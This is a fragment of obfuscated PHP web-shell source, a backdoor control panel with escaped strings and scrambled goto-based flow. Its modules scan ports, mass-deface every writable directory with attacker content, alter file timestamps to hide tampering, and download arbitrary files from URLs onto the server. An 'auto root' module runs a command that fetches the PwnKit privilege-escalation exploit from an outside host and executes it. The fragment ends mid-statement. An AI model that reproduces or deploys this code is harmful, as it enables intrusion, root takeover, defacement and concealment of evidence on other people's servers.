"\42\x3e\56\56\74\x2f\x61\x3e\x3c\57\164\144\76\x3c\164\x64\76\74\57\164\x64\x3e\x3c\164\144\x3e\x3c\x2f\164\x64\76\x3c\x74\x64\x3e\x3c\57\x74\144\76\x3c\164\144\x3e\x3c\57\164\x64\76\x3c\164\x64\x3e\74\57\164\x64\76\x3c\x74\x64\x20\143\x6c\141\163\x73\75\42\x74\145\170\164\x2d\143\x65\x6e\x74\x65\x72\42\76\xa\x9\11\x9\x9\74\x64\151\x76\40\x63\x6c\x61\x73\163\75\x22\x62\x74\x6e\x2d\147\x72\157\x75\x70\x22\76\xa\11\11\11\11\11\x3c\141\40\x63\x6c\141\163\x73\x3d\x22\142\164\x6e\40\142\164\x6e\x2d\x6f\x75\164\154\x69\156\145\x2d\x6c\151\147\150\x74\40\142\x74\x6e\x2d\x73\x6d\42\40\150\x72\145\x66\x3d\x22\77\x66\151\x6c\145\x6e\145\167\46\160\x61\x74\x68\75" . $dir . "\42\76\x3c\151\40\143\x6c\x61\163\x73\75\x22\142\151\40\142\x69\55\146\x69\x6c\145\x2d\145\141\x72\x6d\141\162\153\x2d\x70\x6c\165\163\42\76\74\57\x69\x3e\74\57\x61\76\xa\11\x9\x9\11\x9\x3c\x61\x20\143\154\x61\163\163\x3d\42\142\x74\x6e\x20\x62\164\156\x2d\157\165\164\x6c\151\x6e\x65\x2d\154\151\147\x68\x74\40\x62\x74\x6e\x2d\163\155\42\x20\150\162\145\146\75\x22\77\144\151\x72\x6e\x65\x77\x26\x70\141\164\150\x3d" . $dir . "\42\76\x3c\151\x20\x63\154\141\x73\163\75\42\x62\151\40\142\x69\55\146\x6f\x6c\144\145\162\x2d\160\x6c\x75\163\42\76\x3c\57\151\76\x3c\x2f\141\76\12\x9\11\x9\11\74\x2f\144\151\x76\x3e\12\11\x9\x9\x3c\x2f\x74\x64\76\12\11\x9\x3c\x2f\x74\162\76"; goto JELCs; iHhYJ: if ($_1337["\151\x64"] == "\x70\x6f\x72\164\163\x63\x61\x6e") { s(); echo "\x3c\x63\x65\156\164\x65\162\40\143\154\x61\163\163\75\42\141\156\165\42\x3e\x50\x6f\162\x74\40\x53\x63\141\156\x6e\145\x72\74\x2f\x63\x65\156\164\x65\162\76"; echo "\xa\x20\x20\x20\x20\74\144\151\x76\40\143\x6c\141\x73\x73\x3d\x27\x63\x61\162\144\x20\143\x61\x72\x64\x2d\x62\x6f\144\171\40\x74\145\170\164\55\144\x61\162\153\x20\151\x6e\x70\x75\x74\x2d\x67\x72\x6f\165\x70\x20\x6d\142\x2d\x33\x27\x3e\xa\x20\40\x20\x20\x3c\146\x6f\x72\x6d\x20\x6d\x65\164\150\x6f\144\75\47\x70\x6f\163\164\x27\x3e\xa\x20\x20\x20\x20\x20\40\x20\x20\x3c\x64\x69\x76\40\143\x6c\141\163\x73\x3d\47\x66\157\x72\x6d\x2d\x67\162\157\x75\x70\x27\x3e\xa\40\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x3c\151\x20\x63\x6c\141\163\163\x3d\47\x62\151\x20\142\x69\55\150\x64\144\x2d\x6e\145\164\x77\x6f\162\153\47\x3e\74\x2f\151\x3e\40\124\x61\x72\x67\x65\x74\40\x49\120\x3a\12\x20\40\40\x20\40\40\40\x20\40\40\40\x20\x3c\151\156\160\x75\x74\40\x74\x79\x70\x65\x3d\47\164\145\x78\x74\47\x20\x63\x6c\141\x73\163\75\x27\x66\157\x72\155\x2d\143\x6f\x6e\164\162\x6f\x6c\40\x62\x74\x6e\55\163\155\x20\164\x65\170\x74\55\144\x61\162\x6b\47\x20\156\141\x6d\145\x3d\47\x74\x61\x72\x67\x65\x74\47\40\160\x6c\141\x63\145\x68\x6f\154\x64\x65\162\x3d\47" . $_SERVER["\110\124\124\x50\x5f\110\x4f\x53\124"] . "\x27\x20\x72\x65\x71\165\x69\162\x65\144\x3e\xa\40\x20\40\40\40\40\40\40\x3c\57\x64\151\166\76\12\40\x20\40\40\x20\40\x20\x20\74\x64\151\166\x20\143\x6c\141\x73\163\x3d\47\x66\x6f\x72\155\x2d\x67\x72\x6f\165\x70\x27\x3e\xa\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x3c\151\40\143\154\x61\163\163\x3d\47\x62\x69\x20\x62\151\55\x68\144\x64\x27\76\x3c\x2f\151\x3e\40\123\164\x61\162\x74\40\x50\157\162\164\72\xa\40\x20\40\40\40\x20\40\x20\40\40\x20\40\x3c\x69\x6e\160\x75\x74\x20\x74\x79\x70\x65\x3d\x27\x6e\165\155\142\145\x72\47\x20\x63\154\141\x73\x73\75\47\146\x6f\162\x6d\x2d\x63\x6f\x6e\164\x72\157\154\40\142\x74\156\55\x73\155\x20\x74\145\x78\164\x2d\144\x61\162\x6b\x27\x20\156\x61\x6d\x65\75\47\x73\164\x61\162\x74\120\x6f\162\164\47\40\x70\154\141\143\x65\x68\x6f\154\x64\145\162\x3d\47\x32\61\47\40\x72\145\161\x75\x69\x72\145\x64\x3e\12\x20\40\x20\x20\40\x20\40\40\74\57\144\151\x76\76\xa\x20\x20\x20\40\40\40\x20\40\x3c\x64\151\x76\40\x63\x6c\x61\x73\163\75\x27\x66\x6f\162\155\x2d\x67\x72\x6f\x75\160\x27\x3e\xa\40\40\x20\x20\40\40\x20\x20\40\40\40\x20\74\151\40\x63\x6c\x61\x73\x73\x3d\47\x62\151\40\x62\x69\55\x68\x64\x64\47\x3e\74\57\151\x3e\x20\105\x6e\x64\x20\x50\x6f\162\164\72\12\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\74\151\x6e\160\165\164\x20\164\171\160\145\75\47\x6e\165\x6d\142\145\162\x27\40\x63\154\141\163\x73\75\x27\146\157\162\155\55\x63\157\156\x74\162\157\x6c\40\x62\x74\156\55\163\155\40\x74\x65\170\164\55\x64\141\162\x6b\47\40\x6e\141\x6d\145\75\x27\145\156\x64\120\157\x72\164\47\40\160\x6c\x61\143\x65\150\x6f\x6c\144\145\x72\75\47\61\x30\x30\60\60\47\40\x72\x65\x71\x75\151\x72\x65\144\x3e\xa\x20\x20\x20\40\x20\40\x20\40\x3c\x2f\144\x69\x76\x3e\xa\x20\40\40\40\x20\x20\x20\40\x3c\x64\x69\166\x20\143\154\141\x73\x73\x3d\47\x64\x2d\x67\x72\x69\x64\x20\147\x61\x70\x2d\x32\x27\x3e\12\x20\x20\40\x20\x20\40\40\x20\74\x69\156\x70\165\x74\x20\x63\154\x61\x73\x73\75\x27\x62\164\x6e\40\142\164\156\55\x64\141\x72\153\x20\142\x74\x6e\55\x73\x6d\47\x20\x74\x79\160\x65\75\x27\x73\165\x62\155\x69\164\47\40\x6e\141\155\145\x3d\47\x73\x63\141\x6e\47\x20\166\x61\154\x75\145\75\47\123\165\x62\155\x69\164\x21\x27\76\xa\40\40\x20\x20\x20\40\40\40\x3c\57\144\151\x76\x3e\xa\x20\x20\40\40\x3c\57\146\x6f\x72\155\x3e\xa\74\57\144\151\166\x3e"; if (isset($_POST["\163\143\x61\156"])) { $target = isset($_POST["\x74\x61\x72\147\x65\x74"]) ? $_POST["\x74\x61\x72\x67\145\164"] : "\154\157\143\141\x6c\150\x6f\x73\x74"; $startPort = $_POST["\x73\x74\x61\162\164\x50\x6f\162\164"]; $endPort = $_POST["\x65\156\144\120\157\162\164"]; echo "\74\x64\x69\166\40\x63\154\141\163\163\x3d\x27\143\141\162\x64\40\x63\x61\x72\x64\x2d\x62\157\144\x79\40\x74\x65\x78\x74\55\144\141\x72\153\47\x3e\74\165\154\x3e"; for ($port = $startPort; $port <= $endPort; $port++) { $connection = @fsockopen($target, $port, $errno, $errstr, 1); echo "\x3c\x6c\x69\76"; echo "\x50\x6f\162\x74\x20{$port}\72\x20"; if ($connection) { echo "\x3c\x67\x72\x3e\117\x70\145\156\x3c\57\x67\x72\x3e"; fclose($connection); } else { echo "\x3c\162\144\76\103\154\x6f\x73\145\74\x2f\162\x64\x3e"; } echo "\x3c\x2f\154\x69\x3e"; } echo "\74\x2f\165\154\x3e\74\x2f\144\151\x76\76"; } } goto vo_iU; HKnrr: if ($_1337["\151\x64"] == "\144\145\146\141\143\x65") { function mass_all($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $ = $dirc . "\x2f" . $namefile; if ($dirb === "\56") { file_put_contents($, $contents_sc); } elseif ($dirb === "\56\x2e") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\x5b\x3c\147\x72\76\74\x69\40\x63\x6c\x61\163\163\x3d\47\x62\151\x20\142\151\55\x63\x68\x65\x63\x6b\x2d\x61\154\154\x27\x3e\x3c\x2f\x69\x3e\74\57\x67\x72\76\x5d\46\156\142\163\160\73{$}\74\x62\162\x3e"; file_put_contents($, $contents_sc); $ = mass_all($dirc, $namefile, $contents_sc); } } } } } } function mass_onedir($dir, $namefile, $contents_sc) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $ = $dirc . "\57" . $namefile; if ($dirb === "\56") { file_put_contents($, $contents_sc); } elseif ($dirb === "\x2e\56") { file_put_contents($, $contents_sc); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "\133\x3c\x67\162\76\x3c\x69\x20\143\154\x61\163\163\75\x27\142\151\40\x62\x69\55\x63\150\x65\143\153\55\141\x6c\154\47\76\74\x2f\x69\76\x3c\x2f\x67\162\76\x5d\x26\x6e\142\x73\160\x3b{$dirb}\57{$namefile}\x3c\142\x72\76"; file_put_contents($, $contents_sc); } } } } } } if ($_1337["\163\164\x61\x72\x74"]) { if ($_1337["\x74\151\160\145"] == "\x6d\x61\163\x73") { mass_all($_1337["\144\x5f\144\x69\162"], $_1337["\x64\x5f\x66\x69\x6c\x65"], $_1337["\163\x63\x72\x69\160\164"]); } elseif ($_1337["\x74\x69\x70\145"] == "\157\156\145\144\x69\x72") { mass_onedir($_1337["\144\x5f\144\x69\x72"], $_1337["\x64\x5f\x66\x69\x6c\145"], $_1337["\163\143\x72\x69\160\x74"]); } } s(); echo "\74\143\145\156\x74\x65\162\x20\x63\x6c\x61\x73\163\x3d\x22\x61\x6e\165\42\x3e\x4d\x61\x73\x73\40\x44\145\x66\x61\143\145\x3c\57\143\145\156\x74\145\x72\76"; echo "\xa\x9\11\74\144\151\x76\40\x63\x6c\141\163\163\x3d\47\x63\141\x72\144\40\x63\x61\162\144\55\142\157\144\171\40\164\145\x78\x74\x2d\144\x61\x72\153\40\x69\x6e\x70\x75\164\55\147\162\157\x75\160\40\155\x62\x2d\63\47\76\12\11\x9\11\74\146\157\162\x6d\40\x6d\145\164\150\x6f\x64\x3d\47\120\117\123\x54\x27\76\x20\123\x65\154\145\143\164\40\124\171\160\145\72\xa\x9\x9\x9\x3c\144\151\x76\40\143\x6c\x61\163\x73\75\x27\x66\x6f\x72\155\55\x63\150\145\x63\x6b\x27\x3e\12\x9\x9\x9\x9\x3c\x69\156\160\165\164\40\143\154\141\163\x73\75\47\x66\x6f\x72\x6d\x2d\x63\150\145\x63\153\x2d\x69\156\x70\165\x74\47\40\164\x79\x70\x65\75\47\x63\150\145\x63\x6b\142\x6f\x78\x27\x20\x76\141\x6c\165\x65\75\47\157\x6e\x65\x64\x69\x72\x27\x20\x6e\x61\x6d\145\75\47\x74\x69\x70\145\47\40\151\x64\x3d\x27\146\154\x65\x78\x43\x68\145\143\x6b\x44\145\x66\141\165\x6c\164\x27\40\x63\150\x65\143\153\145\x64\x3e\12\11\x9\11\11\x3c\x6c\x61\x62\145\154\40\x63\154\141\163\x73\75\x27\146\x6f\162\x6d\55\143\150\145\x63\x6b\55\154\x61\142\x65\x6c\x27\40\146\x6f\162\75\x27\x66\154\x65\170\x43\150\x65\143\x6b\104\145\146\141\165\x6c\x74\x27\76\117\156\x65\40\x64\151\x72\x65\x63\164\157\x72\x79\x3c\x2f\x6c\141\142\x65\x6c\x3e\12\x9\x9\x9\x3c\x2f\144\151\166\x3e\xa\11\x9\11\74\144\x69\x76\x20\143\154\141\x73\x73\75\47\146\157\162\155\x2d\x63\150\x65\x63\x6b\47\x3e\xa\11\11\11\11\74\x69\156\x70\x75\x74\40\143\154\141\163\163\75\47\x66\157\162\x6d\x2d\x63\150\x65\x63\x6b\55\151\156\x70\x75\164\47\40\164\x79\160\x65\75\x27\143\150\145\x63\x6b\x62\157\x78\x27\40\166\x61\154\165\x65\x3d\x27\155\x61\x73\x73\47\x20\156\x61\x6d\x65\75\47\x74\x69\x70\x65\47\x20\x69\x64\x3d\x27\146\x6c\145\x78\103\150\145\x63\153\x44\x65\146\x61\x75\154\x74\x27\76\12\11\11\11\11\74\154\x61\x62\x65\154\x20\143\x6c\141\x73\163\x3d\47\146\x6f\162\155\55\143\150\x65\143\153\55\154\141\x62\145\154\x27\40\146\157\162\x3d\x27\x66\x6c\145\x78\103\x68\x65\143\153\x44\145\146\x61\x75\x6c\x74\x27\x3e\x41\154\x6c\x20\144\151\162\x65\x63\x74\157\x72\x79\x3c\x2f\154\x61\142\x65\154\76\12\11\11\x9\74\x2f\144\151\x76\76\12\11\11\11\x9\x3c\151\40\x63\x6c\141\163\163\x3d\x27\142\x69\x20\x62\151\x2d\x66\x6f\154\x64\x65\162\x27\76\x3c\x2f\x69\x3e\40\x44\x69\162\x65\143\164\157\x72\x79\72\xa\11\11\x9\x9\74\x69\x6e\160\165\x74\40\x63\154\x61\x73\163\x3d\x27\146\x6f\x72\x6d\55\143\x6f\x6e\164\162\x6f\x6c\40\x62\164\x6e\55\163\155\40\164\x65\170\164\x2d\144\141\x72\x6b\47\40\164\x79\x70\145\75\47\164\x65\170\164\x27\40\156\x61\x6d\x65\75\47\144\x5f\144\x69\x72\47\40\x76\141\x6c\x75\145\75\x27{$dir}\57\x27\76\12\x9\11\11\x9\74\151\x20\x63\x6c\141\163\x73\75\47\142\x69\x20\142\x69\55\x66\151\x6c\x65\55\145\x61\162\x6d\141\162\153\x27\x3e\74\57\x69\x3e\40\x46\151\x6c\x65\156\141\155\x65\72\12\11\x9\11\x9\74\151\x6e\160\165\x74\40\143\154\141\163\x73\x3d\x27\x66\157\x72\x6d\x2d\143\x6f\156\164\162\x6f\x6c\x20\142\x74\156\x2d\163\x6d\x20\164\x65\170\164\55\144\x61\162\153\47\x20\164\x79\160\145\75\x27\164\145\170\x74\x27\x20\156\x61\155\x65\x3d\x27\x64\137\146\151\154\x65\47\40\160\x6c\141\143\145\150\x6f\x6c\144\x65\x72\x3d\47\154\x6f\x6c\x63\x61\164\163\56\x74\170\164\x27\76\12\x9\11\11\x9\x3c\151\40\143\x6c\141\x73\163\75\47\x62\151\x20\142\x69\x2d\x63\x6f\144\145\x2d\x73\x71\165\x61\x72\145\x27\76\74\57\151\x3e\40\131\157\x75\162\40\123\x63\x72\x69\160\x74\72\12\11\x9\11\x9\74\x74\145\x78\164\141\162\145\x61\40\x63\x6c\x61\163\163\75\47\146\x6f\162\155\55\143\157\x6e\x74\162\x6f\x6c\40\142\x74\x6e\x2d\x73\x6d\x20\164\145\170\164\x2d\144\x61\x72\x6b\x27\40\x72\157\x77\x73\x3d\47\67\47\40\156\141\x6d\145\75\x27\163\143\x72\151\x70\164\x27\x20\x70\x6c\x61\x63\145\150\x6f\154\x64\x65\162\75\x27\x48\141\x63\153\145\x64\40\x62\x79\40\x4c\x6f\154\x63\141\x74\x73\x27\x3e\x3c\x2f\164\x65\x78\164\141\x72\145\141\x3e\12\11\x9\x9\x9\74\144\151\x76\40\x63\x6c\x61\163\x73\75\x27\144\x2d\147\x72\151\x64\x20\x67\141\x70\x2d\62\x27\76\12\11\11\11\x9\x9\x3c\151\156\x70\x75\x74\40\x63\x6c\141\163\x73\x3d\47\142\164\x6e\x20\x62\164\156\x2d\144\141\x72\x6b\x20\142\x74\156\x2d\163\155\x27\40\164\171\x70\145\x3d\47\x73\165\142\x6d\x69\x74\47\40\156\141\155\x65\75\x27\163\x74\x61\x72\164\x27\x20\x76\x61\x6c\x75\x65\x3d\47\x53\x75\142\155\x69\x74\41\47\76\12\11\x9\x9\x9\74\x2f\144\x69\166\76\xa\x9\11\x9\x3c\57\x66\x6f\x72\155\x3e\12\x9\11\x3c\57\144\151\x76\x3e"; } goto JjZzp; xpwtc: if ($_1337["\x69\x64"] == "\x70\167\x6e\153\151\x74") { ob_implicit_flush(); ob_end_flush(); echo "\74\x63\145\x6e\164\x65\162\x20\143\x6c\141\163\163\75\x22\x61\156\165\x22\76\x41\165\x74\x6f\40\x52\x6f\157\164\40\x55\163\x69\156\147\x20\120\x77\156\153\x69\164\74\57\x63\145\156\164\x65\162\76"; echo "\74\144\151\x76\x20\143\154\141\x73\163\75\42\143\157\x6e\x74\141\x69\x6e\145\x72\55\146\154\x75\x69\x64\x20\154\x61\x6e\147\165\141\x67\x65\x2d\x6a\x61\166\x61\163\x63\x72\x69\x70\x74\x22\x3e\12\11\11\11\11\x9\74\144\x69\x76\x20\x63\154\141\x73\x73\75\x22\x73\x68\x65\154\x6c\40\155\142\55\63\x22\x3e\xa\11\x9\x9\x9\11\x9\74\x70\162\x65\40\163\164\x79\x6c\145\75\x22\x66\157\x6e\x74\x2d\x73\151\x7a\x65\x3a\61\60\160\x78\x3b\x22\76\x3c\x63\x6f\x64\x65\76" . exe_root("\143\x75\162\x6c\40\150\x74\x74\160\163\x3a\x2f\57\162\141\x77\56\147\151\164\150\x75\142\165\163\x65\162\x63\x6f\x6e\164\145\x6e\164\x2e\x63\x6f\x6d\x2f\154\171\64\153\57\120\167\156\113\151\x74\x2f\x6d\141\151\x6e\57\x50\x77\156\113\x69\x74\40\x2d\x6f\40\143\x61\164\x73\73\143\150\155\x6f\x64\x20\53\170\40\143\141\x74\x73\x3b\x2e\x2f\143\x61\x74\163\40\x69\144", $path) . "\x3c\x62\162\x3e\x49\146\40\x73\165\x63\143\145\163\163\x66\165\x6c\x2c\40\165\40\143\141\156\40\162\x75\x6e\40\x61\163\40\162\x6f\x6f\x74\40\165\x73\x65\x72\x20\x75\163\x69\156\147\40\143\157\x6d\x6d\141\156\x64\x3a\40\56\57\x63\141\164\163\x20\42\131\x4f\x55\x52\x20\103\x4f\115\x4d\101\x4e\104\x22\x3c\57\143\157\144\x65\x3e\74\57\x70\162\x65\76\x3c\57\x64\151\166\x3e\x3c\57\x64\151\166\76"; } goto zKCFG; vo_iU: if ($_1337["\x61\143\164\x69\x6f\x6e"] == "\143\150\x61\156\x67\145\x6d\x6f\144\151\x66\151\x65\x64\137\x66\x6f\154\144\x65\162") { s(); function changeDate($itemPath, $newDate) { if (is_file($itemPath) || is_dir($itemPath)) { if (touch($itemPath, strtotime($newDate))) { return true; } else { return false; } } return false; } $currentTime = microtime(true); $microseconds = sprintf("\x25\x30\x36\x64", ($currentTime - floor($currentTime)) * 1000000); $dateTimeWithMicroseconds = date("\x59\55\155\55\x64\40\x48\72\x69\x3a\x73\x2e", $currentTime) . $microseconds; $itemToChangeDate = $_GET["\157\160\x6e"]; $itemPathToChangeDate = $path . "\57" . $itemToChangeDate; echo "\74\144\151\x76\x20\143\x6c\141\163\163\x3d\x27\142\x74\x6e\55\147\162\x6f\x75\160\x27\76\12\74\x61\x20\x63\154\141\163\x73\x3d\47\142\x74\x6e\x20\142\164\x6e\x2d\157\165\x74\x6c\x69\156\145\55\154\151\147\150\164\40\x62\164\x6e\x2d\x73\x6d\x27\40\x68\x72\x65\146\x3d\x27\77\x64\151\162\x3d{$path}\x26\141\x63\x74\151\x6f\156\x3d\162\x65\156\141\x6d\145\x5f\146\x6f\154\144\145\x72\x27\x3e\74\x69\40\143\154\141\x73\163\x3d\47\x62\x69\x20\x62\151\x2d\160\145\x6e\x63\151\154\55\x66\151\x6c\x6c\x27\x3e\x3c\x2f\151\76\74\x2f\x61\x3e\12\74\x61\x20\x63\154\141\163\x73\75\47\x62\164\156\40\142\164\156\55\x6f\x75\164\x6c\x69\x6e\x65\55\154\151\147\150\x74\40\x62\164\x6e\x2d\x73\155\47\x20\x68\162\145\146\x3d\x27\x3f\x64\x69\162\x3d{$path}\x26\141\143\x74\x69\x6f\x6e\x3d\x63\x68\x61\x6e\x67\x65\x6d\157\144\151\146\151\x65\x64\137\x66\x6f\154\x64\x65\x72\47\76\74\151\x20\143\154\141\x73\163\x3d\x27\x62\x69\40\142\x69\55\143\141\x6c\145\x6e\144\141\x72\55\x64\x61\x74\145\47\x3e\74\x2f\151\x3e\x3c\x2f\x61\76\12\x3c\x21\55\x2d\74\141\x20\x63\154\x61\x73\x73\x3d\47\x62\164\x6e\x20\142\x74\156\x2d\x6f\x75\164\x6c\151\156\145\55\x6c\151\147\150\x74\40\x62\164\156\x2d\x73\x6d\x27\40\x68\x72\x65\146\75\x27\x3f\x64\x69\162\75{$path}\x26\141\x63\x74\151\157\156\x3d\x63\150\x65\155\157\x64\x27\76\74\151\40\x63\154\x61\x73\x73\75\x27\x62\151\x20\x62\x69\x2d\146\x69\154\145\x2d\x65\141\x72\155\141\162\x6b\x2d\155\x65\x64\x69\x63\141\154\47\76\74\57\x69\76\x3c\x2f\141\76\55\x2d\x3e\xa\x3c\x61\x20\x63\154\x61\x73\163\75\47\x62\x74\156\40\142\x74\x6e\x2d\x6f\x75\164\x6c\x69\156\x65\55\144\141\156\x67\145\x72\40\142\x74\156\x2d\x73\155\47\x20\x68\162\145\x66\x3d\x27\x3f\144\151\162\x3d{$path}\x26\141\x63\164\x69\157\x6e\x3d\144\145\154\x65\164\145\137\146\157\154\144\145\162\47\76\x3c\x69\x20\x63\154\x61\x73\x73\75\47\x62\x69\x20\x62\x69\x2d\164\162\141\x73\x68\55\x66\x69\154\x6c\x27\76\x3c\x2f\x69\x3e\x3c\57\141\x3e\xa\74\x2f\144\x69\166\x3e\xa\x3c\142\162\x3e\74\151\x20\143\154\141\163\x73\75\x27\142\x69\40" . (is_dir($itemPathToChangeDate) ? "\142\151\x2d\146\157\x6c\x64\x65\162" : "\x62\151\55\x66\x69\154\145\x2d\145\141\x72\155\x61\162\153") . "\47\x3e\74\x2f\151\76\x3a\x26\x6e\x62\163\160\73" . basename($itemPathToChangeDate) . "\74\57\142\x72\x3e\12\74\146\157\162\x6d\x20\x6d\x65\x74\150\x6f\144\x3d\47\120\x4f\x53\x54\x27\x3e\74\x64\151\x76\x20\x63\x6c\141\x73\x73\75\47\151\156\160\165\x74\x2d\147\162\x6f\x75\x70\x27\x3e\x3c\151\x6e\160\x75\x74\40\143\154\141\163\x73\x3d\x27\146\157\162\155\55\x63\157\x6e\164\x72\x6f\154\40\142\x74\156\55\x73\x6d\x27\x20\164\x79\160\145\x3d\x27\x74\145\x78\164\47\x20\x6e\x61\x6d\145\x3d\x27\156\x65\167\x5f\144\141\164\145\47\40\166\141\x6c\165\x65\x3d\47" . $dateTimeWithMicroseconds . "\x27\x20{$_r}\x3e\xa\74\142\165\164\x74\x6f\156\x20\143\x6c\141\163\163\x3d\x27\x62\x74\x6e\x20\x62\x74\x6e\55\157\165\164\154\151\x6e\145\55\x6c\151\147\150\164\x20\142\x74\156\x2d\x73\155\x27\x20\164\171\x70\145\75\x27\163\165\x6d\x62\151\164\x27\40\x6e\141\x6d\145\x3d\x27\x63\x68\141\x6e\x67\145\155\x6f\x64\151\146\151\x65\144\137\146\157\154\x64\x65\x72\x27\76\x3c\x69\x20\x63\x6c\x61\163\163\75\x27\142\151\x20\142\x69\x2d\x65\155\x6f\152\x69\55\x73\155\x69\x6c\x65\55\165\x70\163\151\x64\145\x2d\144\x6f\x77\156\47\76\x3c\x2f\151\76\x3c\57\x62\x75\x74\164\157\x6e\76\xa\74\x2f\144\x69\166\x3e\xa\74\x2f\146\157\162\x6d\x3e"; if (isset($_POST["\143\150\x61\156\147\x65\155\157\144\151\x66\151\145\144\137\x66\x6f\154\144\145\162"])) { $newDate = $_POST["\x6e\x65\x77\137\144\x61\x74\x65"]; if (changeDate($itemPathToChangeDate, $newDate)) { echo "\74\x73\x74\162\x6f\156\147\x3e\103\150\x61\156\147\x65\40\x44\141\x74\145\x3c\57\163\164\162\157\x6e\x67\76\x20\x4f\x4b\x21\40" . ok() . "\x3c\x2f\144\x69\166\76"; } else { echo "\x3c\x73\164\162\x6f\156\147\x3e\103\x68\141\x6e\x67\145\40\104\x61\x74\145\74\57\163\164\x72\x6f\x6e\x67\x3e\40\x46\x41\111\x4c\x21\x20" . er() . "\74\57\144\151\166\76"; } } } goto YFNC7; EfyhR: $sm = @ini_get(strtolower("\163\x61\146\x65\137\155\x6f\144\145")) == "\157\x6e" ? "\x3c\162\x64\x3e\117\116\74\57\162\144\x3e" : "\x3c\x67\x72\x3e\x4f\106\x46\74\x2f\x67\162\x3e"; goto mThJN; FP6mR: if ($_1337["\151\x64"] == "\165\x70\x6c\x6f\141\144") { s(); echo "\x3c\x63\145\x6e\x74\x65\x72\40\143\154\141\163\x73\75\42\141\x6e\x75\x22\76\125\160\154\157\x61\144\x20\106\151\154\145\40\x28\106\x72\157\155\40\125\122\x4c\x20\53\40\131\157\x75\162\40\103\157\155\x70\165\164\145\162\51\x3c\x2f\x63\x65\x6e\164\145\162\76"; $userAgent = "\x4d\x6f\x7a\x69\x6c\154\x61\x2f\x35\56\x30\40\x28\127\151\x6e\x64\x6f\167\x73\x20\x4e\x54\x20\61\60\56\60\x3b\x20\127\x69\156\x36\x34\x3b\40\x78\x36\64\x29\x20\x41\x70\x70\154\145\x57\145\x62\113\151\164\57\65\63\x37\x2e\x33\66\x20\50\x4b\110\x54\x4d\x4c\x2c\40\x6c\x69\153\145\40\107\145\143\153\x6f\x29\40\x43\150\162\157\x6d\x65\x2f\71\x36\56\x30\x2e\64\x36\x36\x34\56\61\x31\60\x20\x53\141\146\141\x72\151\x2f\65\63\67\x2e\63\x36"; if ($_SERVER["\x52\105\121\125\105\x53\x54\137\x4d\x45\x54\x48\x4f\x44"] === "\120\x4f\x53\x54") { if (isset($_POST["\165\162\154"]) && isset($_POST["\157\x75\164\x70\165\x74\x5f\x66\151\x6c\x65\x6e\x61\x6d\145"]) && isset($_POST["\155\x65\x74\150\x6f\x64"])) { $url = $_POST["\165\x72\154"]; $outputFilename = $_POST["\x6f\x75\164\160\x75\x74\137\146\x69\x6c\145\156\x61\x6d\x65"]; $method = $_POST["\155\145\x74\x68\157\144"]; switch ($method) { case "\146\x69\x6c\x65\x5f\147\x65\164\137\143\x6f\156\x74\145\x6e\x74\x73": $context = stream_context_create(array("\150\x74\164\160" => array("\x68\145\x61\x64\x65\162" => "\125\163\145\x72\55\x41\147\145\x6e\x74\x3a\x20{$userAgent}"))); $file_content = file_get_contents($url, false, $context); file_put_contents($outputFilename, $file_content); break; case "\x63\165\x72\154": $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, $userAgent); $data = curl_exec($ch); curl_close($ch); file_put_contents($outputFilename, $data); break; case "\x66\x6f\160\145\156": $readHandle = fopen($url, "\162\x62"); $writeHandle = fopen($outputFilename, "\167\142"); if ($readHandle && $writeHandle) { while (!feof($readHandle)) { fwrite($writeHandle, fread($readHandle, 8192)); } } fclose($readHandle); fclose($writeHandle); break; case "\143\x6f\x70\x79": $context = stream_context_create(array("\x68\164\x74\x70" => array("\x68\x65\141\144\x65\x72" => "\x55\163\x65\x72\x2d\x41\147\145\156\x74\x3a\40{$userAgent}"))); copy($url, $outputFilename, $context); break; case "\163\x74\162\145\x61\x6d\x5f\x63\x6f\x6e\x74\x65\170\x74": $context = stream_context_create(array("\x68\x74\164\x70" => array("\x6d\x65\x74\150\x6f\144" => "\107\x45\124", "\x68\145\141\x64\x65\162" => "\125\163\x65\x72\x2d\101\147\145\156\x74\x3a\x20{$userAgent}"))); $file_content = file_get_contents($url, false, $context); file_put_contents($outputFilename, $file_content); break; case "\146\x69\154\145": $context = stream_context_create(array("\x68\x74\164\x70" => array("\x68\x65\141\144\145\162" => "\x55\163\145\x72\55\101\x67\x65\x6e\164\72\40{$userAgent}"))); $file_content = file($url, false, $context); file_put_contents($outputFilename, implode('', $file_content)); break; default: echo "\74\x73\x63\x72\151\160\164\76\x61\154\x65\162\x74\x28\47\x49\x6e\x76\x61\x6c\x69\x64\x20\155\145\164\x68\x6f\144\40\x73\160\145\143\x69\146\151\x65\x64\56\x29\x3b\74\57\163\x63\162\x69\160\164\x3e"; die; } if (filesize($outputFilename) > 0) { $protocol = !empty($_SERVER["\x48\124\x54\x50\123"]) && $_SERVER["\x48\124\124\120\x53"] !== "\x6f\146\146" || $_SERVER["\x53\105\122\126\x45\x52\137\x50\x4f\x52\124"] == 443 ? "\x68\164\x74\160\163" : "\150\x74\164\x70"; $domain = $_SERVER["\110\124\x54\120\x5f\x48\117\x53\124"]; $link = "{$protocol}\x3a\x2f\x2f{$domain}\57{$outputFilename}"; echo "\x3c\143\145\156\164\x65\x72\76\74\160\76\x47\x6f\164\143\x68\141\x21\x20\x43\154\151\x63\x6b\40\x74\x68\145\40\154\151\156\153\x20\x62\145\x6c\x6f\x77\x20\x74\x6f\40\x61\143\143\145\x73\x73\x20\164\150\145\x20\x75\160\154\157\x61\x64\x65\x64\40\x66\x69\154\x65\72\x3c\x2f\x70\x3e\x3c\x61\40\x68\x72\x65\x66\x3d" . $link . "\x20\164\x61\162\x67\145\x74\x3d\47\x5f\x62\154\x61\156\x6b\x27\x20\x63\154\x61\163\x73\75\x27\142\x74\156\x20\x62\164\x6e\x2d\x64\x61\156\147\145\x72\x27\76" . basename($outputFilename) . "\74\x2f\141\76\74\142\x72\x3e\74\x62\162\76"; } else { echo 